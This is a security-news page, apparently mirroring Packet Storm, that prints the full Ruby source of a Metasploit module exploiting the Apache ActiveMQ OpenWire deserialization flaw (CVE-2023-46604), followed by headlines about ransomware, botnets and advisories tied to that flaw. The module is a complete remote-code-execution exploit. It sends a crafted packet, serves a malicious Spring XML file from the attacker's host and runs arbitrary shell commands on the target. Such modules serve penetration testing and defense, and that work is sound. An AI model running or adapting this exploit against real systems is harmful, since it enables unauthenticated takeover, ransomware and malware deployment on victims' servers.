Security
Headlines
HeadlinesLatestCVEs

Headline

Apache ActiveMQ Unauthenticated Remote Code Execution

This Metasploit module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to 5.16.6, and all versions before 5.15.16.

Packet Storm
#vulnerability#windows#linux#apache#git#java#rce#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpServer  include Msf::Exploit::Remote::Tcp  include Msf::Exploit::Retry  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Apache ActiveMQ Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache          ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to          5.16.6, and all versions before 5.15.16.        },        'License' => MSF_LICENSE,        'Author' => [          'X1r0z', # Original technical analysis & exploit          'sfewer-r7', # MSF exploit & Rapid7 analysis        ],        'References' => [          ['CVE', '2023-46604'],          ['URL', 'https://github.com/X1r0z/ActiveMQ-RCE'],          ['URL', 'https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/'],          ['URL', 'https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis'],          ['URL', 'https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt']        ],        'DisclosureDate' => '2023-10-27',        'Privileged' => false,        'Platform' => %w[win linux unix],        'Arch' => [ARCH_CMD],        # The Msf::Exploit::Remote::HttpServer mixin will bring in Exploit::Remote::SocketServer, this will set the        # Stance to passive, which is unexpected and results in the exploit running as a background job, as RunAsJob will        # be set to true. To avoid this happening, we explicitly set the Stance to Aggressive.        'Stance' => Stance::Aggressive,        'Targets' => [          [            'Windows',            {              'Platform' => 'win'            }          ],          [            'Linux',            {              'Platform' => 'linux'            }          ],          [            'Unix',            {              'Platform' => 'unix'            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          # By default ActiveMQ listens for OpenWire requests on TCP port 61616.          'RPORT' => 61616,          # The maximum time in seconds to wait for a session.          'WfsDelay' => 30        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )  end  def check    connect    res = sock.get_once    disconnect    return CheckCode::Unknown unless res    len, _, magic = res.unpack('NCZ*')    return CheckCode::Unknown unless res.length == len + 4    return CheckCode::Unknown unless magic == 'ActiveMQ'    return CheckCode::Detected unless res =~ /ProviderVersion...(\d+\.\d+\.\d+)/    version = Rex::Version.new(::Regexp.last_match(1))    ranges = [      ['5.18.0', '5.18.2'],      ['5.17.0', '5.17.5'],      ['5.16.0', '5.16.6'],      ['0.0.0', '5.15.15']    ]    ranges.each do |min, max|      if version.between?(Rex::Version.new(min), Rex::Version.new(max))        return Exploit::CheckCode::Appears("Apache ActiveMQ #{version}")      end    end    Exploit::CheckCode::Safe("Apache ActiveMQ #{version}")  end  def exploit    # The payload is send in a CDATA section of an XML file. Therefore, the payload cannot contain a CDATA closing tag.    if payload.encoded.include? ']]>'      fail_with(Failure::BadConfig, 'The encoded payload data may not contain the CDATA closing tag ]]>')    end    start_service    connect    # The vulnerability allows us to instantiate an arbitrary class, with a single arbitrary string parameter. To    # leverage this we can use ClassPathXmlApplicationContext, and pass a URL to an XML configuration file we    # serve. This XML file allows us to create arbitrary classes, and call arbitrary methods. This is leveraged to    # run an attacker supplied command line via java.lang.ProcessBuilder.start.    clazz = 'org.springframework.context.support.ClassPathXmlApplicationContext'    # 31 is the EXCEPTION_RESPONSE data type.    data = [31].pack('C')    # ResponseMarshaller.looseUnmarshal reads a 4 byte int for the command id.    data << [0].pack('N')    # and a 1 byte boolean for response required.    data << [0].pack('C')    # ResponseMarshaller.looseUnmarshal read a 4 byte int for the correlation ID.    data << [0].pack('N')    # BaseDataStreamMarshaller.looseUnmarsalThrowable wants a boolean true to continue to unmarshall.    data << [1].pack('C')    # BaseDataStreamMarshaller.looseUnmarshalString reads a byte boolean and if true, reads a UTF-8 string.    data << [1].pack('C')    # First 2 bytes are the length.    data << [clazz.length].pack('n')    # Then the string data. This is the class name to instantiate.    data << clazz    # Same again for the method string. This is the single string parameter used during class instantiation.    data << [1].pack('C')    data << [get_uri.length].pack('n')    data << get_uri    sock.puts([data.length].pack('N') + data)    retry_until_truthy(timeout: datastore['WfsDelay']) do      !handler_enabled? || session_created?    end    handler  ensure    cleanup  end  def on_request_uri(cli, request)    if request.uri != get_resource      super    end    case target['Platform']    when 'win'      shell = 'cmd.exe'      flag = '/c'    when 'linux', 'unix'      shell = '/bin/sh'      flag = '-c'    end    xml = %(<?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="#{Rex::Text.rand_text_alpha(8)}" class="java.lang.ProcessBuilder" init-method="start">  <constructor-arg>    <list>      <value>#{shell}</value>      <value>#{flag}</value>      <value><![CDATA[#{payload.encoded}]]></value>    </list>  </constructor-arg></bean></beans>)    send_response(cli, xml, {      'Content-Type' => 'application/xml',      'Connection' => 'close',      'Pragma' => 'no-cache'    })    print_status('Sent ClassPathXmlApplicationContext configuration file.')  endend

Related news

Debian Security Advisory 5798-1

Debian Linux Security Advisory 5798-1 - Christoper L. Shannon discovered that the implementation of the OpenWire protocol in Apache ActiveMQ was susceptible to the execution of arbitrary code.

Ubuntu Security Notice USN-6910-1

Ubuntu Security Notice 6910-1 - Chess Hazlett discovered that Apache ActiveMQ incorrectly handled certain commands. A remote attacker could possibly use this issue to terminate the program, resulting in a denial of service. This issue only affected Ubuntu 16.04 LTS. Peter Stoeckli discovered that Apache ActiveMQ incorrectly handled hostname verification. A remote attacker could possibly use this issue to perform a person-in-the-middle attack. This issue only affected Ubuntu 16.04 LTS.

OX App Suite 7.10.6 Cross Site Scripting / Deserialization Issue

OX App Suite version 7.10.6 suffers from cross site scripting and deserialization vulnerabilities.

November 2023 – January 2024: New Vulristics Features, 3 Months of Microsoft Patch Tuesdays and Linux Patch Wednesdays, Year 2023 in Review

Hello everyone! It has been 3 months since the last episode. I spent most of this time improving my Vulristics project. So in this episode, let’s take a look at what’s been done. Alternative video link (for Russia): https://vk.com/video-149273431_456239139 Also, let’s take a look at the Microsoft Patch Tuesdays vulnerabilities, Linux Patch Wednesdays vulnerabilities and […]

Apache ActiveMQ Flaw Exploited in New Godzilla Web Shell Attacks

Cybersecurity researchers are warning of a "notable increase" in threat actor activity actively exploiting a now-patched flaw in Apache ActiveMQ to deliver the Godzilla web shell on compromised hosts. "The web shells are concealed within an unknown binary format and are designed to evade security and signature-based scanners," Trustwave said. "Notably, despite the binary's unknown file

Atlassian Releases Critical Software Fixes to Prevent Remote Code Execution

Atlassian has released software fixes to address four critical flaws in its software that, if successfully exploited, could result in remote code execution. The list of vulnerabilities is below - CVE-2022-1471 (CVSS score: 9.8) - Deserialization vulnerability in SnakeYAML library that can lead to remote code execution in multiple products CVE-2023-22522 (CVSS score

Cybercriminals Exploit ActiveMQ Flaw to Spread GoTitan Botnet, PrCtrl Rat

By Deeba Ahmed The ActiveMQ flaw has been patched, but despite this, numerous threat actors continue to exploit it. This is a post from HackRead.com Read the original post: Cybercriminals Exploit ActiveMQ Flaw to Spread GoTitan Botnet, PrCtrl Rat

GoTitan Botnet Spotted Exploiting Recent Apache ActiveMQ Vulnerability

The recently disclosed critical security flaw impacting Apache ActiveMQ is being actively exploited by threat actors to distribute a new Go-based botnet called GoTitan as well as a .NET program known as PrCtrl Rat that's capable of remotely commandeering the infected hosts. The attacks involve the exploitation of a remote code execution bug (CVE-2023-46604, CVSS score: 10.0) that has been

N. Korean Hackers 'Mixing' macOS Malware Tactics to Evade Detection

The North Korean threat actors behind macOS malware strains such as RustBucket and KANDYKORN have been observed "mixing and matching" different elements of the two disparate attack chains, leveraging RustBucket droppers to deliver KANDYKORN. The findings come from cybersecurity firm SentinelOne, which also tied a third macOS-specific malware called ObjCShellz to the RustBucket campaign.

Kinsing Crypto Malware Targets Linux Systems via Apache ActiveMQ Flaw

By Deeba Ahmed Patches for all affected versions of Apache ActiveMQ have been released, and clients are strongly advised to upgrade their systems. This is a post from HackRead.com Read the original post: Kinsing Crypto Malware Targets Linux Systems via Apache ActiveMQ Flaw

Kinsing Hackers Exploit Apache ActiveMQ Vulnerability to Deploy Linux Rootkits

The Kinsing threat actors are actively exploiting a critical security flaw in vulnerable Apache ActiveMQ servers to infect Linux systems with cryptocurrency miners and rootkits. "Once Kinsing infects a system, it deploys a cryptocurrency mining script that exploits the host's resources to mine cryptocurrencies like Bitcoin, resulting in significant damage to the infrastructure and a negative

New PoC Exploit for Apache ActiveMQ Flaw Could Let Attackers Fly Under the Radar

Cybersecurity researchers have demonstrated a new technique that exploits a critical security flaw in Apache ActiveMQ to achieve arbitrary code execution in memory. Tracked as CVE-2023-46604 (CVSS score: 10.0), the vulnerability is a remote code execution bug that could permit a threat actor to run arbitrary shell commands. It was patched by Apache in ActiveMQ versions 5.15.16, 5.16.7, 5.17.6,

Experts Warn of Ransomware Hackers Exploiting Atlassian and Apache Flaws

Multiple ransomware groups have begun to actively exploit recently disclosed flaws in Atlassian Confluence and Apache ActiveMQ. Cybersecurity firm Rapid7 said it observed the exploitation of CVE-2023-22518 and CVE-2023-22515 in multiple customer environments, some of which have been leveraged for the deployment of Cerber (aka C3RB3R) ransomware. Both vulnerabilities are critical, allowing threat

Apache ActiveMQ vulnerability used in ransomware attacks

A remote code execution vulnerability in Apache ActiveMQ is being used by the HelloKItty ransomware group.

HelloKitty Ransomware Group Exploiting Apache ActiveMQ Vulnerability

Cybersecurity researchers are warning of suspected exploitation of a recently disclosed critical security flaw in the Apache ActiveMQ open-source message broker service that could result in remote code execution. "In both instances, the adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations," cybersecurity firm Rapid7 disclosed in a

GHSA-crg9-44h2-xw35: Apache ActiveMQ is vulnerable to Remote Code Execution

Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.  Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.

CVE-2023-46604

Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.  Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution